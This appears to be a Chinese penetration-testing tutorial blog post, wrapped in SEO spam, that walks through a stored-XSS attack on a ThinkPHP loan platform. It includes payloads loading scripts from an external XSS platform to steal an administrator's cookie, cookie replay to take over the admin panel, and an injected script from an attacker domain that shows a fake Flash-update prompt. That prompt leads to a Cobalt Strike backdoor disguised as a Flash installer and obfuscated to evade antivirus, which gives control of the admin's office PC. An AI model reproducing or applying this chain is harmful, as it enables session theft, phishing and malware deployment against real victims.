长春网站seo外包小网站广告投放

长春网站seo外包,小网站广告投放,做性的网站,东营做网站优化的公司前言 这是我给粉丝盆友们整理的网络安全渗透测试入门阶段XSS攻击教程。 本阶段主要讲解XSS攻击获取用户cookie和用户密码。 喜欢的朋友们#xff0c;记得给我点赞支持和收藏一下#xff0c;关注我#xff0c;学习黑客技术。 简介 该篇章目的是重新牢固地基#xff0c;…前言这是我给粉丝盆友们整理的网络安全渗透测试入门阶段XSS攻击教程。本阶段主要讲解XSS攻击获取用户cookie和用户密码。喜欢的朋友们记得给我点赞支持和收藏一下关注我学习黑客技术。简介该篇章目的是重新牢固地基加强每日训练操作的笔记在记录地基笔记中会有很多跳跃性思维的操作和方式方法望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究对于所有笔记中复现的这些终端或者服务器都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的如果列出的技术用于其他任何目标本站及作者概不负责。一、前言网络钓鱼是社会工程学攻击方式之一主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码等还是其他敏感信息黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。这篇主要演示如何利用XSS植入钓鱼获得管理员内部电脑权限二、环境介绍黑客攻击者IP192.168.1.9系统kali.2020.4kali上作为cs的服务端VPS服务器thinkphp平台地址http://test1.dayuixiyou.cn/钓鱼地址http://flash.dayuixiyou.cn办公电脑系统windwos7双网卡192.168.175.153 和 10.10.1.5目前kali上运行了Cobalt strike 攻击者在自己的公网VPS服务器上制作了后门页面钓鱼通过渗透发现thinkphp贷款平台页面存在XSS漏洞利用通过插入XSS-js代码植入链接最终黑客控制管理员办公电脑的过程三、XSS演示此次演示贷款thinkphp平台在公网服务器上1、注册账号密码进入个人中心注册用户名密码登录用户名密码后普通用户界面点击设置输入结算信息测试下2、存在XSS漏洞输入scriptalert(1)/script测试结果修改成功查看下前端…查看源代码-编辑后查看到没变动XSS代码还是存在…说明存在XSS攻击3、注册XSS平台https://xss.pt/xss.php?dologin进入XSS利用平台google也有很多别的平台 随意注册一个账号创建一个新的项目随意填写选择Keepsession保持会话 下一步会弹出需要执行的XSS利用代码…选择标准代码测试/tExtArEasCRiPt sRChttps://xss.pt..aJ/sCrIpT4、利用XSS漏洞/tExtArEasCRiPt sRChttps://xss.pt/..aJ/sCrIpT这一段就是payload将XSS连接信息返回到https://xss.pt平台上提交信息后可看到网络net中XSS执行成功了…执行成功那么XSS平台就收到了信息可看到5、获取管理员cookie点击提现…申请结算成功后会将XSS执行代码转发到后台结算该模块中当后台管理员访问管理界面给客户结算资金的时候点击提现申请模块就会执行XSS植入的代码这时候就返回了管理员的cookie和URL信息6、cookie登录后台目录扫描获得管理后台登录页面通过Burp suite转包拦截后将XSS平台获取XSS漏洞植入代码返回的包中修改其中的url和cookie信息send执行后通过cookie进入到了管理员后台复制URL浏览器中访问后正常进入管理员后台四、利用XSS钓鱼1、搭建Flash钓鱼页面在公网服务器搭建钓鱼页面任何能访问互联网客户都可以访问该页面2、生成免杀后门利用Cobal Strike生成C#语言的shell…利用该shell进行混淆并利用python的tinyaes模块混淆也行在来个分离免杀最后利用pyinstaller生成exe外壳…必过全国杀毒软件不演示过程将flash修改名字为flashplayer_install_cn.exe或者修改为update等吸引人下载的名称都行3、修改Flash源码这是Flash贷款平台源码文件目录修改index.html代码找到其中href进行修改为flashplayer_install_cn.exe意思就是点击页面立即下载就能自动下载目录下的exe后门文件在准备个js文件意思是执行该js后会在页面提示您的 FLASH 版本过低尝试升级后访问该页面!并访问到该页面http://flash.dayuixiyou.cn/将exe和js都上传到功能网服务器apache底层测试访问可看到正常读取确保内网管理员能执行XSS后访问到js文件这里就可以开始了4、利用XSS漏洞植入JS可看到利用三中XSS利用的方法执行插入sCRiPtsRC//flash.dayuixiyou.cn/flash-test.js/sCrIpT#需要前后加入闭合 “ ”当立即提交 后直接执行了XSS植入的js文件并提示了js中的内容然后点确定后直接跳转到flash页面和三中的方法一样需要在后台管理页面也执行XSS需要结算金额让管理员去结算的时候点击执行XSS5、执行XSS下载flash可看到内网管理员上班期间登录到管理后台登录管理员用户后工作职责需要给客户结算金额点击了提现申请一般客户安全意识极差点击完成后出现了您的 FLASH 版本过低尝试升级后访问该页面!一般情况下都会点击确认确认后跳转到flash页面逼真的页面点击立即下载这里有个20.1MB的大小信息这里简单在html修改下数字和EXE内容大小即可可看到下载了该后门这里图标我没修改google或者百度利用Folder Changer修改成flash安装包的图标更逼真这里的exe是全免杀的杀毒软件都无法放行6、成功XSS钓鱼执行安装成功在kali攻击机上的CS上线可看到获取到了管理员电脑的权限五、总结这里通过渗透中找到了某平台的XSS漏洞利用XSS漏洞植入代码执行诱骗到了对方客服或者管理员的内网电脑权限其中最少需要熟悉如何搭站、HTML、js、域名、XSS、免杀、CS4等等知识才可搭建那么很多人都说flash都是经典的钓鱼漏洞了全国警惕性都会高很多那么我还是老话提供的是思路如果是一个破解软件一个购买网站一个利用虚荣心或者是贪小便宜的购物页面等等进行钓鱼进行各类的植入的话那有多少人会中招希望大家提高安全意识没有网络安全就没有国家安全今天基础牢固就到这里虽然基础但是必须牢记于心。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料给那些想学习 网络安全的小伙伴们一点帮助对于从来没有接触过网络安全的同学我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线大家跟着这个大的方向学习准没问题。因篇幅有限仅展示部分资料朋友们如果有需要全套《网络安全入门进阶学习资源包》请看下方扫描即可前往获取